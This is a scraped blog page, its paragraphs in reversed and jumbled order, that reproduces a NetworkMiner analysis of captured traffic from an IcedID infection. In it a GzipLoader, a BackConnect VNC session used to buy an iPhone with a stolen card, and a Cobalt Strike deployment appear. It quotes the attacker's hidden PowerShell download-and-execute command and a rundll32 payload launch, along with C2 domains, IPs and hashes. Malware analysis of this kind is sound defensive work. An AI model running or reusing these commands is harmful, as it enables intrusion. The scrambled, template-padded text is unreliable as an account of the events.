AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |
Back to Blog
Cobalt strike watermark2/29/2024 ![]() The BackConnect Reverse Shell log in NetworkMiner's Parameters tab shows that the attacker also attempted to download Cobalt Strike using PowerShell at 15:41:59 UTC (frame 145176) with this command:Ĭ:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(' IOC List Triage also revealed that the CobaltStrike C2 URL wasĬlouditsoftcom:8008/static-directory/mg.jpgĪfter the DLL gets executed the victim PC establishes Cobalt Strike beacon C2 connections to clouditsoftcom on port 8008 (frame 144715). Luckily I was able to use Triage's malware config extractor to verify that this was indeed Cobalt Strike ( P2.dll on tria.ge). However, none of them label it as Cobalt Strike. This file is flagged as malicious by most AV vendors ( P2.dll on VT). Image: Files extracted from network trafficĪs you can see in the screenshot above, the MD5 hash of P2.dll is cc69a31a067b62dda5f2076f8ee335e1. NetworkMiner extracts this uploaded DLL from the BackConnect network traffic. Rundll32 c:\programdata\P2.dll,DllRegisterServer These three commands are issued in the first reverse shell session: ![]() Luckily, the transaction was denied by Apple Store.Īfter having failed to buy an iPhone through the hacked computer the attacker instead deploys three reverse shell sessions using the BackConnect C2 channel. Image: Credit card details entered in Apple Store by attacker The attacker proceeds to the Apple Store, puts a black iPhone 14 Plus for $987.99 into the shopping cart, enters a delivery address in West Hartford (US) and then inputs credit card details for the payment. Image: Google search results from reverse VNC session The VNC graphics that NetworkMiner extracted from the PCAP file additionally reveal that this was a Google search query typed into an Edge browser. The keylog of the attacker above reveals that the attacker is typing “iphone 14 apple store buy”. Image: Attacker’s keystrokes extracted from BackConnect VNC traffic Image: Screenshot of attacker’s view of victim screen (Keyhole VNC) The BackConnect C2 server tells the bot to sleep for 60 seconds two times before launching a reverse VNC session with command 0x11 (frame 4530 at 15:01.09 UTC). Shortly after the IcedID C2 traffic has been started the IcedID bot also initiates BackConnect C2 connections to 137.74.104.108 on TCP port 8080 (frame 4505 at 14:59:14 UTC). Image: Self-signed certificate from ringashopsucom Both these properties can be used as filters in NetworkMiner's Hosts tab to only display the IcedID C2 servers. These four IcedID servers all run TLS servers with self signed certificates issued for "localhost" and doing TLS handshakes with JA3S hash ec74a5c51106f0419184d0dd08fb05bc. The banking trojan IcedID (aka BokBot) gets launched at 14:47:29 UTC (frame 641) after which it connects to these four IcedID servers used for payload delivery and C2: This file actually contains the IcedID DLL ( Odwikp.dll) and license.dat files. The response for this GzipLoader request is a 550 kB file (MD5 700c602086590b05dde8df57933c7e68) with a fake gzip header. IcedID PhotoLoader evolution by Jason Reaves and theĮSentire blog post on Gootloader and IcedID. Image: Hostname, SID, username and Windows version extracted from GzipLoader cookieįor more info about the GzipLoader cookie, see NetworkMiner decodes these values from the GzipLoader request and displays them in the Hosts tab. The long “_u” value contains the victim’s username and hostname in hexadecimal representation and the “_io” value is the logged in user’s SID. ![]() The “_gat” cookie value in frame number 6 tells us that the victim machine is running a Windows 10 build 19045 (aka 22H2). Image: Cookie parameters from GzipLoader request This infection starts with GzipLoader (aka “IcedID Downloader”) reaching out to its C2 server on vgiragdoffycom ( 67.205.184.237:80) to download IcedID. I ran NetworkMiner in a Windows Sandbox when analyzing this PCAP file to avoid accidentally infecting my computer with any of the malicious artifacts that NetworkMiner extracts from the network traffic.Īnother safe way to analyze Windows malware is to run NetworkMiner in Linux or macOS. The analyzed pcap is -IcedID-with-DarkVNC-and-Cobalt-Strike-full-pcap-raw.pcap from Brad Duncan's blog. In this blog post I use the free and open source version of NetworkMiner to see how GzipLoader downloads IcedID, after which the attacker deploys BackConnect VNC to purchase an iPhone 14 with a stolen credit card and then drops Cobalt Strike on the victim PC. The BackConnect and VNC parsers that were added to NetworkMiner 2.8.1 provide a unique possibility to trace the steps of an attacker with help of captured network traffic from a hacked computer.
0 Comments
Read More
Leave a Reply. |